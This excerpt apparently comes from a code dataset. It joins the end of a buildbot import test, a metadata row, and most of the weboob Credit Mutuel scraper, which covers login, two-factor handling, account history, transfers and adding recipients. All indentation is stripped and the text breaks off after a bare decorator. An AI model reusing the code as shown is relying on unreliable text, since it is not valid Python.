from buildbot.steps.source import Source
assert Source
def test_buildstep_remotecommand(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecatedApiWarning)
warnings.simplefilter("ignore", DeprecationWarning)
from buildbot.process.buildstep import RemoteCommand, \
LoggedRemoteCommand, RemoteShellCommand
assert RemoteCommand
assert LoggedRemoteCommand
assert RemoteShellCommand
def test_buildstep_logobserver(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecatedApiWarning)
warnings.simplefilter("ignore", DeprecationWarning)
from buildbot.process.buildstep import LogObserver, \
LogLineObserver, OutputProgressObserver
assert LogObserver
assert LogLineObserver
assert OutputProgressObserver
| gpl-2.0 | 1,922,292,393,852,996,900 | 33.672131 | 79 | 0.706619 | false |
laurentb/weboob | modules/creditmutuel/browser.py | 1 | 43250 | # -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Julien Veyssier
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import re
import time
from datetime import datetime
from itertools import groupby
from operator import attrgetter
from weboob.exceptions import (
ActionNeeded, AppValidation, AppValidationExpired, AppValidationCancelled, AuthMethodNotImplemented,
BrowserIncorrectPassword, BrowserUnavailable, BrowserQuestion, NoAccountsException,
)
from weboob.tools.compat import basestring
from weboob.tools.value import Value
from weboob.tools.capabilities.bank.transactions import FrenchTransaction, sorted_transactions
from weboob.browser.browsers import need_login, TwoFactorBrowser
from weboob.browser.profiles import Wget
from weboob.browser.url import URL
from weboob.browser.pages import FormNotFound
from weboob.browser.exceptions import ClientError, ServerError
from weboob.capabilities.bank import Account, AddRecipientStep, Recipient, AccountOwnership
from weboob.tools.capabilities.bank.investments import create_french_liquidity
from weboob.capabilities import NotAvailable
from weboob.tools.compat import urlparse
from weboob.capabilities.base import find_object, empty
from .pages import (
LoginPage, LoginErrorPage, AccountsPage, UserSpacePage,
OperationsPage, CardPage, ComingPage, RecipientsListPage,
ChangePasswordPage, VerifCodePage, EmptyPage, PorPage,
IbanPage, NewHomePage, AdvisorPage, RedirectPage,
LIAccountsPage, CardsActivityPage, CardsListPage,
CardsOpePage, NewAccountsPage, InternalTransferPage,
ExternalTransferPage, RevolvingLoanDetails, RevolvingLoansList,
ErrorPage, SubscriptionPage, NewCardsListPage, CardPage2, FiscalityConfirmationPage,
ConditionsPage, MobileConfirmationPage, UselessPage, DecoupledStatePage, CancelDecoupled,
OtpValidationPage, OtpBlockedErrorPage, TwoFAUnabledPage,
LoansOperationsPage,
)
__all__ = ['CreditMutuelBrowser']
class CreditMutuelBrowser(TwoFactorBrowser):
PROFILE = Wget()
TIMEOUT = 30
BASEURL = 'https://www.creditmutuel.fr'
HAS_CREDENTIALS_ONLY = True
STATE_DURATION = 5
TWOFA_DURATION = 60 * 24 * 90
# connexion
login = URL(
r'/fr/authentification.html',
r'/(?P<subbank>.*)fr/$',
r'/(?P<subbank>.*)fr/banques/accueil.html',
r'/(?P<subbank>.*)fr/banques/particuliers/index.html',
LoginPage
)
login_error = URL(r'/(?P<subbank>.*)fr/identification/default.cgi', LoginErrorPage)
twofa_unabled_page = URL(r'/(?P<subbank>.*)fr/banque/validation.aspx', TwoFAUnabledPage)
mobile_confirmation = URL(r'/(?P<subbank>.*)fr/banque/validation.aspx', MobileConfirmationPage)
decoupled_state = URL(r'/fr/banque/async/otp/SOSD_OTP_GetTransactionState.htm', DecoupledStatePage)
cancel_decoupled = URL(r'/fr/banque/async/otp/SOSD_OTP_CancelTransaction.htm', CancelDecoupled)
otp_validation_page = URL(r'/(?P<subbank>.*)fr/banque/validation.aspx', OtpValidationPage)
otp_blocked_error_page = URL(r'/(?P<subbank>.*)fr/banque/validation.aspx', OtpBlockedErrorPage)
fiscality = URL(r'/(?P<subbank>.*)fr/banque/residencefiscale.aspx', FiscalityConfirmationPage)
# accounts
accounts = URL(r'/(?P<subbank>.*)fr/banque/situation_financiere.cgi',
r'/(?P<subbank>.*)fr/banque/situation_financiere.html',
AccountsPage)
useless_page = URL(r'/(?P<subbank>.*)fr/banque/paci/defi-solidaire.html', UselessPage)
revolving_loan_list = URL(r'/(?P<subbank>.*)fr/banque/CR/arrivee.asp\?fam=CR.*', RevolvingLoansList)
revolving_loan_details = URL(r'/(?P<subbank>.*)fr/banque/CR/cam9_vis_lstcpt.asp.*', RevolvingLoanDetails)
user_space = URL(r'/(?P<subbank>.*)fr/banque/espace_personnel.aspx',
r'/(?P<subbank>.*)fr/banque/accueil.cgi',
r'/(?P<subbank>.*)fr/banque/DELG_Gestion',
r'/(?P<subbank>.*)fr/banque/paci_engine/engine.aspx',
r'/(?P<subbank>.*)fr/banque/paci_engine/static_content_manager.aspx',
UserSpacePage)
card = URL(r'/(?P<subbank>.*)fr/banque/operations_carte.cgi.*',
r'/(?P<subbank>.*)fr/banque/mouvements.html\?webid=.*cardmonth=\d+$',
r'/(?P<subbank>.*)fr/banque/mouvements.html.*webid=.*cardmonth=\d+.*cardid=',
CardPage)
operations = URL(r'/(?P<subbank>.*)fr/banque/mouvements.cgi.*',
r'/(?P<subbank>.*)fr/banque/mouvements.html.*',
r'/(?P<subbank>.*)fr/banque/nr/nr_devbooster.aspx.*',
r'(?P<subbank>.*)fr/banque/CRP8_GESTPMONT.aspx\?webid=.*&trnref=.*&contract=\d+&cardid=.*&cardmonth=\d+',
OperationsPage)
# This loans_operations contains operation for some loans, but not all of them.
loans_operations = URL(r'/(?P<subbank>.*)fr/banque/gec9.aspx.*', LoansOperationsPage)
coming = URL(r'/(?P<subbank>.*)fr/banque/mvts_instance.cgi.*', ComingPage)
info = URL(r'/(?P<subbank>.*)fr/banque/BAD.*', EmptyPage)
change_pass = URL(r'/(?P<subbank>.*)fr/validation/change_password.cgi',
'/fr/services/change_password.html', ChangePasswordPage)
verify_pass = URL(r'/(?P<subbank>.*)fr/validation/verif_code.cgi.*',
r'/(?P<subbank>.*)fr/validation/lst_codes.cgi.*', VerifCodePage)
new_home = URL(r'/(?P<subbank>.*)fr/banque/pageaccueil.html',
r'/(?P<subbank>.*)banque/welcome_pack.html', NewHomePage)
empty = URL(r'/(?P<subbank>.*)fr/banques/index.html',
r'/(?P<subbank>.*)fr/banque/paci_beware_of_phishing.*',
r'/(?P<subbank>.*)fr/validation/(?!change_password|verif_code|image_case|infos).*',
EmptyPage)
por = URL(r'/(?P<subbank>.*)fr/banque/POR_ValoToute.aspx',
r'/(?P<subbank>.*)fr/banque/POR_SyntheseLst.aspx',
PorPage)
por_action_needed = URL(r'/(?P<subbank>.*)fr/banque/ORDR_InfosGenerales.aspx', EmptyPage)
li = URL(r'/(?P<subbank>.*)fr/assurances/profilass.aspx\?domaine=epargne',
r'/(?P<subbank>.*)fr/assurances/(consultations?/)?WI_ASS.*',
r'/(?P<subbank>.*)fr/assurances/WI_ASS',
r'/(?P<subbank>.*)fr/assurances/SYNASSINT.aspx.*',
'/fr/assurances/', LIAccountsPage)
iban = URL(r'/(?P<subbank>.*)fr/banque/rib.cgi', IbanPage)
new_accounts = URL(r'/(?P<subbank>.*)fr/banque/comptes-et-contrats.html', NewAccountsPage)
new_operations = URL(r'/(?P<subbank>.*)fr/banque/mouvements.cgi',
r'/fr/banque/nr/nr_devbooster.aspx.*',
r'/(?P<subbank>.*)fr/banque/RE/aiguille(liste)?.asp',
'/fr/banque/mouvements.html',
r'/(?P<subbank>.*)fr/banque/consultation/operations', OperationsPage)
advisor = URL(r'/(?P<subbank>.*)fr/banques/contact/trouver-une-agence/(?P<page>.*)',
r'/(?P<subbank>.*)fr/infoclient/',
r'/(?P<subbank>.*)fr/banques/accueil/menu-droite/Details.aspx\?banque=.*',
AdvisorPage)
redirect = URL(r'/(?P<subbank>.*)fr/banque/paci_engine/static_content_manager.aspx', RedirectPage)
cards_activity = URL(r'/(?P<subbank>.*)fr/banque/pro/ENC_liste_tiers.aspx', CardsActivityPage)
cards_list = URL(r'/(?P<subbank>.*)fr/banque/pro/ENC_liste_ctr.*',
r'/(?P<subbank>.*)fr/banque/pro/ENC_detail_ctr', CardsListPage)
cards_ope = URL(r'/(?P<subbank>.*)fr/banque/pro/ENC_liste_oper', CardsOpePage)
cards_ope2 = URL('/(?P<subbank>.*)fr/banque/CRP8_SCIM_DEPCAR.aspx', CardPage2)
cards_hist_available = URL('/(?P<subbank>.*)fr/banque/SCIM_default.aspx\?_tabi=C&_stack=SCIM_ListeActivityStep%3a%3a&_pid=ListeCartes&_fid=ChangeList&Data_ServiceListDatas_CurrentType=MyCards',
'/(?P<subbank>.*)fr/banque/PCS1_CARDFUNCTIONS.aspx', NewCardsListPage)
cards_hist_available2 = URL('/(?P<subbank>.*)fr/banque/SCIM_default.aspx', NewCardsListPage)
internal_transfer = URL(r'/(?P<subbank>.*)fr/banque/virements/vplw_vi.html', InternalTransferPage)
external_transfer = URL(r'/(?P<subbank>.*)fr/banque/virements/vplw_vee.html', ExternalTransferPage)
recipients_list = URL(r'/(?P<subbank>.*)fr/banque/virements/vplw_bl.html', RecipientsListPage)
error = URL(r'/(?P<subbank>.*)validation/infos.cgi', ErrorPage)
subscription = URL(r'/(?P<subbank>.*)fr/banque/MMU2_LstDoc.aspx', SubscriptionPage)
terms_and_conditions = URL(r'/(?P<subbank>.*)fr/banque/conditions-generales.html',
r'/(?P<subbank>.*)fr/banque/coordonnees_personnelles.aspx',
r'/(?P<subbank>.*)fr/banque/paci_engine/paci_wsd_pdta.aspx',
r'/(?P<subbank>.*)fr/banque/reglementation-dsp2.html', ConditionsPage)
currentSubBank = None
is_new_website = None
form = None
logged = None
need_clear_storage = None
accounts_list = None
def __init__(self, config, *args, **kwargs):
self.config = config
self.weboob = kwargs['weboob']
kwargs['username'] = self.config['login'].get()
kwargs['password'] = self.config['password'].get()
super(CreditMutuelBrowser, self).__init__(config, *args, **kwargs)
self.__states__ += (
'currentSubBank', 'form', 'logged', 'is_new_website',
'need_clear_storage', 'recipient_form',
'twofa_auth_state', 'polling_data', 'otp_data',
)
self.twofa_auth_state = {}
self.polling_data = {}
self.otp_data = {}
self.keep_session = None
self.recipient_form = None
self.AUTHENTICATION_METHODS = {
'resume': self.handle_polling,
'code': self.handle_sms,
}
def get_expire(self):
if self.twofa_auth_state:
expires = datetime.fromtimestamp(self.twofa_auth_state['expires']).isoformat()
return expires
return
def load_state(self, state):
# when add recipient fails, state can't be reloaded.
# If state is reloaded, there is this error message:
# "Navigation interdite - Merci de bien vouloir recommencer votre action."
if state.get('need_clear_storage'):
# only keep 'twofa_auth_state' state to avoid new 2FA
state = {'twofa_auth_state': state.get('twofa_auth_state')}
if state.get('polling_data') or state.get('recipient_form') or state.get('otp_data'):
# can't start on an url in the middle of a validation process
# or server will cancel it and launch another one
if 'url' in state:
state.pop('url')
# if state is empty (first login), it does nothing
super(CreditMutuelBrowser, self).load_state(state)
def finalize_twofa(self, twofa_data):
"""
Go to validated 2FA url. Before following redirection,
store 'auth_client_state' cookie to prove to server,
for a TWOFA_DURATION, that 2FA is already done.
"""
self.location(
twofa_data['final_url'],
data=twofa_data['final_url_params'],
allow_redirects=False
)
for cookie in self.session.cookies:
if cookie.name == 'auth_client_state':
# only present if 2FA is valid
self.twofa_auth_state['value'] = cookie.value # this is a token
self.twofa_auth_state['expires'] = cookie.expires # this is a timestamp
self.location(self.response.headers['Location'])
def handle_polling(self):
# 15' on website, we don't wait that much, but leave sufficient time for the user
timeout = time.time() + 600.00 # 15' on webview, need not to wait that much
while time.time() < timeout:
data = {'transactionId': self.polling_data['polling_id']}
self.decoupled_state.go(data=data)
decoupled_state = self.page.get_decoupled_state()
if decoupled_state == 'VALIDATED':
self.logger.info('AppValidation done, going to final_url')
self.finalize_twofa(self.polling_data)
self.polling_data = {}
return
elif decoupled_state in ('CANCELLED', 'NONE'):
self.polling_data = {}
raise AppValidationCancelled()
assert decoupled_state == 'PENDING', 'Unhandled polling state: "%s"' % decoupled_state
time.sleep(5) # every second on wbesite, need to slow that down
# manually cancel polling before website max duration for it
self.cancel_decoupled.go(data=data)
self.polling_data = {}
raise AppValidationExpired()
def check_otp_blocked(self):
# Too much wrong OTPs, locked down after total 3 wrong inputs
if self.otp_blocked_error_page.is_here():
error_msg = self.page.get_error_message()
raise BrowserUnavailable(error_msg)
def handle_sms(self):
self.otp_data['final_url_params']['otp_password'] = self.code
self.finalize_twofa(self.otp_data)
## cases where 2FA is not finalized
# Too much wrong OTPs, locked down after total 3 wrong inputs
self.check_otp_blocked()
# OTP is expired after 15', we end up on login page
if self.login.is_here():
raise BrowserIncorrectPassword("Le code de confirmation envoyé par SMS n'est plus utilisable")
# Wrong OTP leads to same form with error message, re-raise BrowserQuestion
elif self.otp_validation_page.is_here():
error_msg = self.page.get_error_message()
if 'erroné' not in error_msg:
raise BrowserUnavailable(error_msg)
else:
label = '%s %s' % (error_msg, self.page.get_message())
raise BrowserQuestion(Value('code', label=label))
self.otp_data = {}
def check_redirections(self):
self.logger.info('Checking redirections')
# MobileConfirmationPage or OtpValidationPage is coming but there is no request_information
location = self.response.headers.get('Location', '')
if 'validation.aspx' in location and not self.is_interactive:
self.check_interactive()
elif location:
self.location(location, allow_redirects=False)
def check_auth_methods(self):
if self.mobile_confirmation.is_here():
self.page.check_bypass()
if self.mobile_confirmation.is_here():
self.polling_data = self.page.get_polling_data()
assert self.polling_data, "Can't proceed to polling if no polling_data"
raise AppValidation(self.page.get_validation_msg())
if self.otp_validation_page.is_here():
self.otp_data = self.page.get_otp_data()
assert self.otp_data, "Can't proceed to SMS handling if no otp_data"
raise BrowserQuestion(Value('code', label=self.page.get_message()))
self.check_otp_blocked()
def init_login(self):
self.login.go()
# 2FA already done, if valid, login() redirects to home page
if self.twofa_auth_state:
self.session.cookies.set('auth_client_state', self.twofa_auth_state['value'])
self.page.login(self.username, self.password, redirect=True)
if not self.page.logged:
# 302 redirect to catch to know if polling
self.page.login(self.username, self.password)
self.check_redirections()
# for cic, there is two redirections
self.check_redirections()
if self.twofa_unabled_page.is_here():
raise ActionNeeded(self.page.get_error_msg())
# when people try to log in but there are on a sub site of creditmutuel
if not self.page and not self.url.startswith(self.BASEURL):
raise BrowserIncorrectPassword()
if self.login_error.is_here():
raise BrowserIncorrectPassword()
if self.verify_pass.is_here():
raise AuthMethodNotImplemented("L'identification renforcée avec la carte n'est pas supportée.")
self.check_auth_methods()
self.getCurrentSubBank()
def ownership_guesser(self):
profile = self.get_profile()
psu_names = profile.name.lower().split()
for account in self.accounts_list:
label = account.label.lower()
# We try to find "M ou Mme" or "Mlle XXX ou M XXXX" for example (non-exhaustive exemple list)
if re.search(r'.* ((m) ([\w].*|ou )?(m[ml]e)|(m[ml]e) ([\w].*|ou )(m) ).*', label):
account.ownership = AccountOwnership.CO_OWNER
# We check if the PSU firstname and lastname is in the account label
elif all(name in label.split() for name in psu_names):
account.ownership = AccountOwnership.OWNER
# Card Accounts should be set with the same ownership of their parents
for account in self.accounts_list:
if account.type == Account.TYPE_CARD and not empty(account.parent):
account.ownership = account.parent.ownership
@need_login
def get_accounts_list(self):
if not self.accounts_list:
if self.currentSubBank is None:
self.getCurrentSubBank()
self.two_cards_page = None
self.accounts_list = []
self.revolving_accounts = []
self.unavailablecards = []
self.cards_histo_available = []
self.cards_list =[]
self.cards_list2 =[]
# For some cards the validity information is only availaible on these 2 links
self.cards_hist_available.go(subbank=self.currentSubBank)
if self.cards_hist_available.is_here():
self.unavailablecards.extend(self.page.get_unavailable_cards())
for acc in self.page.iter_accounts():
acc._referer = self.cards_hist_available
self.accounts_list.append(acc)
self.cards_list.append(acc)
self.cards_histo_available.append(acc.id)
if not self.cards_list:
self.cards_hist_available2.go(subbank=self.currentSubBank)
if self.cards_hist_available2.is_here():
self.unavailablecards.extend(self.page.get_unavailable_cards())
for acc in self.page.iter_accounts():
acc._referer = self.cards_hist_available2
self.accounts_list.append(acc)
self.cards_list.append(acc)
self.cards_histo_available.append(acc.id)
for acc in self.revolving_loan_list.stay_or_go(subbank=self.currentSubBank).iter_accounts():
self.accounts_list.append(acc)
self.revolving_accounts.append(acc.label.lower())
# Handle cards on tiers page
self.cards_activity.go(subbank=self.currentSubBank)
companies = self.page.companies_link() if self.cards_activity.is_here() else \
[self.page] if self.is_new_website else []
for company in companies:
# We need to return to the main page to avoid navigation error
self.cards_activity.go(subbank=self.currentSubBank)
page = self.open(company).page if isinstance(company, basestring) else company
for card in page.iter_cards():
card2 = find_object(self.cards_list, id=card.id[:16])
if card2:
# In order to keep the id of the card from the old space, we exchange the following values
card._link_id = card2._link_id
card._parent_id = card2._parent_id
card.coming = card2.coming
card._referer = card2._referer
card._secondpage = card2._secondpage
self.accounts_list.remove(card2)
self.accounts_list.append(card)
self.cards_list2.append(card)
self.cards_list.extend(self.cards_list2)
# Populate accounts from old website
if not self.is_new_website:
self.logger.info('On old creditmutuel website')
self.accounts.stay_or_go(subbank=self.currentSubBank)
has_no_account = self.page.has_no_account()
self.accounts_list.extend(self.page.iter_accounts())
self.iban.go(subbank=self.currentSubBank).fill_iban(self.accounts_list)
self.por.go(subbank=self.currentSubBank)
self.page.add_por_accounts(self.accounts_list)
# Populate accounts from new website
else:
self.new_accounts.stay_or_go(subbank=self.currentSubBank)
has_no_account = self.page.has_no_account()
self.accounts_list.extend(self.page.iter_accounts())
self.iban.go(subbank=self.currentSubBank).fill_iban(self.accounts_list)
self.por.go(subbank=self.currentSubBank)
self.page.add_por_accounts(self.accounts_list)
self.li.go(subbank=self.currentSubBank)
self.accounts_list.extend(self.page.iter_li_accounts())
# This type of account is like a loan, for splitting payments in smaller amounts.
# Its history is irrelevant because money is debited from a checking account and
# the balance is not even correct, so ignore it.
excluded_label = ['etalis', 'valorisation totale']
accounts_by_id = {}
for acc in self.accounts_list:
if acc.label.lower() not in excluded_label:
accounts_by_id[acc.id] = acc
# Set the parent to loans and cards accounts
for acc in self.accounts_list:
if acc.type == Account.TYPE_CARD and not empty(getattr(acc, '_parent_id', None)):
acc.parent = accounts_by_id.get(acc._parent_id, NotAvailable)
elif acc.type in (Account.TYPE_MORTGAGE, Account.TYPE_LOAN) and acc._parent_id:
acc.parent = accounts_by_id.get(acc._parent_id, NotAvailable)
self.accounts_list = list(accounts_by_id.values())
if has_no_account and not self.accounts_list:
raise NoAccountsException(has_no_account)
self.ownership_guesser()
return self.accounts_list
def get_account(self, _id):
assert isinstance(_id, basestring)
for a in self.get_accounts_list():
if a.id == _id:
return a
def getCurrentSubBank(self):
# the account list and history urls depend on the sub bank of the user
paths = urlparse(self.url).path.lstrip('/').split('/')
self.currentSubBank = paths[0] + "/" if paths[0] != "fr" else ""
if self.currentSubBank and paths[0] == 'banqueprivee' and paths[1] == 'mabanque':
self.currentSubBank = 'banqueprivee/mabanque/'
if self.currentSubBank and paths[1] == "decouverte":
self.currentSubBank += paths[1] + "/"
if paths[0] in ["cmmabn", "fr", "mabanque", "banqueprivee"]:
self.is_new_website = True
def list_operations(self, page, account):
if isinstance(page, basestring):
if page.startswith('/') or page.startswith('https') or page.startswith('?'):
self.location(page)
else:
try:
self.location('%s/%sfr/banque/%s' % (self.BASEURL, self.currentSubBank, page))
except ServerError as e:
self.logger.warning('Page cannot be visited: %s/%sfr/banque/%s: %s', self.BASEURL, self.currentSubBank, page, e)
raise BrowserUnavailable()
else:
self.page = page
# On some savings accounts, the page lands on the contract tab, and we want the situation
if account.type == Account.TYPE_SAVINGS and "Capital Expansion" in account.label:
self.page.go_on_history_tab()
if self.li.is_here():
return self.page.iter_history()
if self.is_new_website and self.page:
try:
for page in range(1, 50):
# Need to reach the page with all transactions
if not self.page.has_more_operations():
break
form = self.page.get_form(id="I1:P:F")
form['_FID_DoLoadMoreTransactions'] = ''
form['_wxf2_pseq'] = page
form.submit()
# IndexError when form xpath returns [], StopIteration if next called on empty iterable
except (StopIteration, FormNotFound):
self.logger.warning('Could not get history on new website')
except IndexError:
# 6 months history is not available
pass
while self.page:
try:
# Submit form if their is more transactions to fetch
form = self.page.get_form(id="I1:fm")
if self.page.doc.xpath('boolean(//a[@class="ei_loadmorebtn"])'):
form['_FID_DoLoadMoreTransactions'] = ""
form.submit()
else:
break
except (IndexError, FormNotFound):
break
# Sometimes the browser can't go further
except ClientError as exc:
if exc.response.status_code == 413:
break
raise
if not self.operations.is_here():
return iter([])
return self.pagination(lambda: self.page.get_history())
def get_monthly_transactions(self, trs):
date_getter = attrgetter('date')
groups = [list(g) for k, g in groupby(sorted(trs, key=date_getter), date_getter)]
trs = []
for group in groups:
if group[0].date > datetime.today().date():
continue
tr = FrenchTransaction()
tr.raw = tr.label = "RELEVE CARTE %s" % group[0].date
tr.amount = -sum(t.amount for t in group)
tr.date = tr.rdate = tr.vdate = group[0].date
tr.type = FrenchTransaction.TYPE_CARD_SUMMARY
tr._is_coming = False
tr._is_manualsum = True
trs.append(tr)
return trs
@need_login
def get_history(self, account):
transactions = []
if not account._link_id:
raise NotImplementedError()
if len(account.id) >= 16 and account.id[:16] in self.cards_histo_available:
if self.two_cards_page:
# In this case, you need to return to the page where the iter account get the cards information
# Indeed, for the same position of card in the two pages the url, headers and parameters are exactly the same
account._referer.go(subbank=self.currentSubBank)
if account._secondpage:
self.location(self.page.get_second_page_link())
# Check if '000000xxxxxx0000' card have an annual history
self.location(account._link_id)
# The history of the card is available for 1 year with 1 month per page
# Here we catch all the url needed to be the more compatible with the catch of merged subtransactions
urlstogo = self.page.get_links()
self.location(account._link_id)
half_history = 'firstHalf'
for url in urlstogo:
transactions = []
self.location(url)
if 'GoMonthPrecedent' in url:
# To reach the 6 last month of history you need to change this url parameter
# Moreover we are on a transition page where we see the 6 next month (no scrapping here)
half_history = 'secondHalf'
else:
history = self.page.get_history()
self.tr_date = self.page.get_date()
amount_summary = self.page.get_amount_summary()
if self.page.has_more_operations():
for i in range(1, 100):
# Arbitrary range; it's the number of click needed to access to the full history of the month (stop with the next break)
data = {
'_FID_DoAddElem': '',
'_wxf2_cc': 'fr-FR',
'_wxf2_pmode': 'Normal',
'_wxf2_pseq': i,
'_wxf2_ptarget': 'C:P:updPan',
'Data_ServiceListDatas_CurrentOtherCardThirdPartyNumber': '',
'Data_ServiceListDatas_CurrentType': 'MyCards',
}
if 'fid=GoMonth&mois=' in self.url:
m = re.search(r'fid=GoMonth&mois=(\d+)', self.url)
if m:
m = m.group(1)
self.location('CRP8_SCIM_DEPCAR.aspx?_tabi=C&a__itaret=as=SCIM_ListeActivityStep\%3a\%3a\%2fSCIM_ListeRouter%3a%3a&a__mncret=SCIM_LST&a__ecpid=EID2011&_stack=_remote::moiSelectionner={},moiAfficher={},typeDepense=T&_pid=SCIM_DEPCAR_Details'.format(m, half_history), data=data)
else:
self.location(self.url, data=data)
if not self.page.has_more_operations_xml():
history = self.page.iter_history_xml(date=self.tr_date)
# We are now with an XML page with all the transactions of the month
break
else:
history = self.page.get_history(date=self.tr_date)
for tr in history:
# For regrouped transaction, we have to go through each one to get details
if tr._regroup:
self.location(tr._regroup)
for tr2 in self.page.get_tr_merged():
tr2._is_coming = tr._is_coming
tr2.date = self.tr_date
transactions.append(tr2)
else:
transactions.append(tr)
if transactions and self.tr_date < datetime.today().date():
tr = FrenchTransaction()
tr.raw = tr.label = "RELEVE CARTE %s" % self.tr_date
tr.amount = amount_summary
tr.date = tr.rdate = tr.vdate = self.tr_date
tr.type = FrenchTransaction.TYPE_CARD_SUMMARY
tr._is_coming = False
tr._is_manualsum = True
transactions.append(tr)
for tr in sorted_transactions(transactions):
yield tr
else:
# need to refresh the months select
if account._link_id.startswith('ENC_liste_oper'):
self.location(account._pre_link)
if not hasattr(account, '_card_pages'):
for tr in self.list_operations(account._link_id, account):
transactions.append(tr)
coming_link = self.page.get_coming_link() if self.operations.is_here() else None
if coming_link is not None:
for tr in self.list_operations(coming_link, account):
transactions.append(tr)
deferred_date = None
cards = ([page.select_card(account._card_number) for page in account._card_pages]
if hasattr(account, '_card_pages')
else account._card_links if hasattr(account, '_card_links') else [])
for card in cards:
card_trs = []
for tr in self.list_operations(card, account):
if tr._to_delete:
# Delete main transaction when subtransactions exist
continue
if hasattr(tr, '_deferred_date') and (not deferred_date or tr._deferred_date < deferred_date):
deferred_date = tr._deferred_date
if tr.date >= datetime.now():
tr._is_coming = True
elif hasattr(account, '_card_pages'):
card_trs.append(tr)
transactions.append(tr)
if card_trs:
transactions.extend(self.get_monthly_transactions(card_trs))
if deferred_date is not None:
# set deleted for card_summary
for tr in transactions:
tr.deleted = (tr.type == FrenchTransaction.TYPE_CARD_SUMMARY
and deferred_date.month <= tr.date.month
and not hasattr(tr, '_is_manualsum'))
for tr in sorted_transactions(transactions):
yield tr
@need_login
def get_investment(self, account):
if account._is_inv:
if account.type in (Account.TYPE_MARKET, Account.TYPE_PEA):
self.por.go(subbank=self.currentSubBank)
self.page.send_form(account)
elif account.type == Account.TYPE_LIFE_INSURANCE:
if not account._link_inv:
return iter([])
self.location(account._link_inv)
return self.page.iter_investment()
if account.type is Account.TYPE_PEA:
liquidities = create_french_liquidity(account.balance)
liquidities.label = account.label
return [liquidities]
return iter([])
@need_login
def iter_recipients(self, origin_account):
# access the transfer page
self.internal_transfer.go(subbank=self.currentSubBank)
if self.page.can_transfer(origin_account.id):
for recipient in self.page.iter_recipients(origin_account=origin_account):
yield recipient
self.external_transfer.go(subbank=self.currentSubBank)
if self.page.can_transfer(origin_account.id):
origin_account._external_recipients = set()
if self.page.has_transfer_categories():
for category in self.page.iter_categories():
self.page.go_on_category(category['index'])
self.page.IS_PRO_PAGE = True
for recipient in self.page.iter_recipients(origin_account=origin_account, category=category['name']):
yield recipient
else:
for recipient in self.page.iter_recipients(origin_account=origin_account):
yield recipient
@need_login
def init_transfer(self, account, to, amount, exec_date, reason=None):
if to.category != 'Interne':
self.external_transfer.go(subbank=self.currentSubBank)
else:
self.internal_transfer.go(subbank=self.currentSubBank)
if self.external_transfer.is_here() and self.page.has_transfer_categories():
for category in self.page.iter_categories():
if category['name'] == to.category:
self.page.go_on_category(category['index'])
break
self.page.IS_PRO_PAGE = True
self.page.RECIPIENT_STRING = 'data_input_indiceBen'
self.page.prepare_transfer(account, to, amount, reason, exec_date)
return self.page.handle_response(account, to, amount, reason, exec_date)
@need_login
def execute_transfer(self, transfer, **params):
form = self.page.get_form(id='P:F', submit='//input[@type="submit" and contains(@value, "Confirmer")]')
# For the moment, don't ask the user if he confirms the duplicate.
form['Bool:data_input_confirmationDoublon'] = 'true'
form.submit()
return self.page.create_transfer(transfer)
@need_login
def get_advisor(self):
advisor = None
if not self.is_new_website:
self.logger.info('On old creditmutuel website')
self.accounts.stay_or_go(subbank=self.currentSubBank)
if self.page.get_advisor_link():
advisor = self.page.get_advisor()
self.location(self.page.get_advisor_link()).page.update_advisor(advisor)
else:
advisor = self.new_accounts.stay_or_go(subbank=self.currentSubBank).get_advisor()
link = self.page.get_agency()
if link:
link = link.replace(':443/', '/')
self.location(link)
self.page.update_advisor(advisor)
return iter([advisor]) if advisor else iter([])
@need_login
def get_profile(self):
if not self.is_new_website:
self.logger.info('On old creditmutuel website')
profile = self.accounts.stay_or_go(subbank=self.currentSubBank).get_profile()
else:
profile = self.new_accounts.stay_or_go(subbank=self.currentSubBank).get_profile()
return profile
def get_recipient_object(self, recipient):
r = Recipient()
r.iban = recipient.iban
r.id = recipient.iban
r.label = recipient.label
r.category = recipient.category
# On credit mutuel recipients are immediatly available.
r.enabled_at = datetime.now().replace(microsecond=0)
r.currency = 'EUR'
r.bank_name = NotAvailable
return r
def format_recipient_form(self, key):
self.recipient_form['[t:xsd%3astring;]Data_KeyInput'] = key
# we don't know the card id
# by default all users have only one card
# but to be sure, let's get it dynamically
do_validate = [k for k in self.recipient_form.keys() if '_FID_DoValidate_cardId' in k]
assert len(do_validate) == 1, 'There should be only one card.'
self.recipient_form[do_validate[0]] = ''
activate = [k for k in self.recipient_form.keys() if '_FID_GoCardAction_action' in k]
for _ in activate:
del self.recipient_form[_]
def continue_new_recipient(self, recipient, **params):
if 'Clé' in params:
url = self.recipient_form.pop('url')
self.format_recipient_form(params['Clé'])
self.location(url, data=self.recipient_form)
self.recipient_form = None
if self.verify_pass.is_here():
self.page.handle_error()
assert False, 'An error occured while checking the card code'
self.page.add_recipient(recipient)
if self.page.bic_needed():
self.page.ask_bic(self.get_recipient_object(recipient))
self.page.ask_sms(self.get_recipient_object(recipient))
def send_sms(self, sms):
data = {}
for k, v in self.form.items():
if k != 'url':
data[k] = v
data['otp_password'] = sms
data['_FID_DoConfirm.x'] = '1'
data['_FID_DoConfirm.y'] = '1'
data['global_backup_hidden_key'] = ''
self.location(self.form['url'], data=data)
def end_new_recipient(self, recipient, **params):
self.send_sms(params['code'])
self.form = None
self.page = None
self.logged = 0
return self.get_recipient_object(recipient)
def post_with_bic(self, recipient, **params):
data = {}
for k, v in self.form.items():
if k != 'url':
data[k] = v
data['[t:dbt%3astring;x(11)]data_input_BIC'] = params['Bic']
self.location(self.form['url'], data=data)
self.page.ask_sms(self.get_recipient_object(recipient))
def set_new_recipient(self, recipient, **params):
if self.currentSubBank is None:
self.getCurrentSubBank()
if 'Bic' in params:
return self.post_with_bic(recipient, **params)
if 'code' in params:
return self.end_new_recipient(recipient, **params)
if 'Clé' in params:
return self.continue_new_recipient(recipient, **params)
assert False, 'An error occured while adding a recipient.'
@need_login
